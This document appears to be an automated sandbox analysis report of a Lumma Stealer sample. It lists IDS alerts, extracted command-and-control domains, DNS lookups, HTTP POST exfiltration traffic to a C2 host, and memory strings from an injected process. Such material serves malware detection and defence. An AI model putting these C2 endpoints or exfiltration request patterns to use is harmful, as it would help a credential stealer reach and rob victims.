                Source: Network trafficSuricata IDS: 2058610 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (framekgirus .shop) : 192.168.2.12:59491 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.12:49722 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.12:49716 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.12:49716 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.12:49721 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.12:49715 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.12:49714 -> 104.102.49.254:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.12:49715 -> 104.21.112.1:443
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: tirepublicerj.shop
                Source: Malware configuration extractorURLs: cloudewahsj.shop
                Source: Malware configuration extractorURLs: wholersorie.shop
                Source: Malware configuration extractorURLs: abruptyopsn.shop
                Source: Malware configuration extractorURLs: framekgirus.shop
                Source: Malware configuration extractorURLs: noisycuttej.shop
                Source: Malware configuration extractorURLs: rabidcowse.shop
                Source: Malware configuration extractorURLs: bootstringjl.click
                Source: Malware configuration extractorURLs: nearycrepso.shop
                Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
                Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49714 -> 104.102.49.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49715 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49718 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49720 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49716 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49719 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49721 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49722 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49717 -> 104.21.112.1:443
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sputnik-1985.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: sputnik-1985.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=U8EC1VY5VE892AI389User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12844Host: sputnik-1985.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NR6WZU599JG4CJFS1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15073Host: sputnik-1985.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=L84VY24J9K91LVK0AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20248Host: sputnik-1985.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=IWA9NYINFDTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1184Host: sputnik-1985.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=31SWZHMOWET50R8LPRUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1123Host: sputnik-1985.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 121Host: sputnik-1985.com
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ ht equals www.youtube.com (Youtube)
                Source: BitLockerToGo.exe, 00000004.00000003.2820715380.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ttps://www.youtube.com hC equals www.youtube.com (Youtube)
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: global trafficDNS traffic detected: DNS query: bootstringjl.click
                Source: global trafficDNS traffic detected: DNS query: nearycrepso.shop
                Source: global trafficDNS traffic detected: DNS query: abruptyopsn.shop
                Source: global trafficDNS traffic detected: DNS query: wholersorie.shop
                Source: global trafficDNS traffic detected: DNS query: framekgirus.shop
                Source: global trafficDNS traffic detected: DNS query: tirepublicerj.shop
                Source: global trafficDNS traffic detected: DNS query: noisycuttej.shop
                Source: global trafficDNS traffic detected: DNS query: rabidcowse.shop
                Source: global trafficDNS traffic detected: DNS query: cloudewahsj.shop
                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                Source: global trafficDNS traffic detected: DNS query: sputnik-1985.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sputnik-1985.com
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                Source: NjFiIQNSid.exeString found in binary or memory: http://backend.userland.com/creativeCommonsRssModulehttp://madskills.com/public/xml/rss/module/pingb
                Source: BitLockerToGo.exe, 00000004.00000003.2799863216.00000000054FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: BitLockerToGo.exe, 00000004.00000003.2799863216.00000000054FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: BitLockerToGo.exe, 00000004.00000003.2799863216.00000000054FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: BitLockerToGo.exe, 00000004.00000003.2799863216.00000000054FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: BitLockerToGo.exe, 00000004.00000003.2799863216.00000000054FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: BitLockerToGo.exe, 00000004.00000003.2799863216.00000000054FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: BitLockerToGo.exe, 00000004.00000003.2799863216.00000000054FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: NjFiIQNSid.exeString found in binary or memory: http://cyber.law.harvard.edu/rss/creativeCommonsRssModule.htmllimiterEvent.stop:
                Source: NjFiIQNSid.exeString found in binary or memory: http://madskills.com/public/xml/rss/module/trackback/nats:
                Source: BitLockerToGo.exe, 00000004.00000003.2799863216.00000000054FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: BitLockerToGo.exe, 00000004.00000003.2799863216.00000000054FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: NjFiIQNSid.exeString found in binary or memory: http://podlove.org/simple-chaptersillegal
                Source: NjFiIQNSid.exeString found in binary or memory: http://postneo.com/icbm/idna:
                Source: NjFiIQNSid.exeString found in binary or memory: http://schemas.pocketsoap.com/rss/myDescModule/invalid
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2834241377.000000000314F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2859436926.0000000003197000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2820648610.0000000003194000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2847490722.0000000003194000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.000000000310B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.000000000310B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                Source: NjFiIQNSid.exeString found in binary or memory: http://web.resource.org/cc/input
                Source: NjFiIQNSid.exeString found in binary or memory: http://webns.net/mvcb/idna:
                Source: NjFiIQNSid.exeString found in binary or memory: http://www.opengis.net/gmlhttp://xmlns.com/foaf/0.1/integer
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                Source: BitLockerToGo.exe, 00000004.00000003.2799863216.00000000054FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: BitLockerToGo.exe, 00000004.00000003.2799863216.00000000054FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: BitLockerToGo.exe, 00000004.00000003.2775147988.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2775052601.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2774980988.000000000548C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                Source: BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                Source: BitLockerToGo.exe, 00000004.00000003.2775147988.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2775052601.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2774980988.000000000548C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                Source: BitLockerToGo.exe, 00000004.00000003.2775147988.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2775052601.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2774980988.000000000548C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: BitLockerToGo.exe, 00000004.00000003.2775147988.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2775052601.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2774980988.000000000548C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fas
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2834241377.000000000314F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2820648610.0000000003194000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2847490722.0000000003194000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastl
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastl9
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamsta
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatY
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.co
                Source: BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/publi)
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.000000000310B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                Source: BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.000000000310B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.000000000310B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.000000000310B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.000000000310B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.000000000310B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?vy
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWT9
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
